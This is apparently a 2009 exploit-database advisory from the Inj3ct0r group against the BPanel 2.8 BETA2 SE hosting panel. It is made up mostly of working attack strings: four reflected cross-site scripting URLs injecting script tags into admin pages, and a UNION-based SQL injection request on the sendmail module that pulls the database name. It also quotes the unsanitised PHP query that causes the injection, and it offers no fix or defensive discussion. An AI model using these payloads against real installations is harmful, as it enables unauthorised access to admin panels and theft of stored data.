bpanel-sqlxss.txt
Posted on 26 August 2009
========================================================= BPanel <= 2.8 BETA2 SE XSS + SQL Inj3ct0r Vulnerabilities ========================================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 #[+] Discovered By : Inj3ct0r #[+] Site : Inj3ct0r.com #[+] support e-mail : submit[at]inj3ct0r.com Product : BPanel site: http://bpanel.ru/ version: BPanel 2.8 BETA2 SE XSS Exploit: /admin/index.php?mod=user&userwhere=ID&id=<script>alert()</ script> /admin/index.php?mod=tarif&go=formupdate&id="><script>alert()</script> (all) /admin/template/help.php?rowservice[3]=<script>alert()</ script> /admin/conf/database.php?tablebanners=<script>alert()</ script> --------------------------------- ThE End =] Visit my proj3ct : http://inj3ct0r.com http://inj3ct0r.org http://inj3ct0r.net --------------------------------- SQL inj3ct0r Exploit: GET: /admin/index.php?mod=sendmail&go=massmail&start=letter&to_user=-1'+union+select+1,2,3,4,DATABASE(),6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20--%20 Vulnerable code: $resultuser = mysql_query ('' . 'select * from ' . $tableuser . ' where ID='' . $to_user . '''); ThE End =] Visit my proj3ct : http://inj3ct0r.com http://inj3ct0r.org http://inj3ct0r.net # ~ - [ [ : Inj3ct0r : ] ]
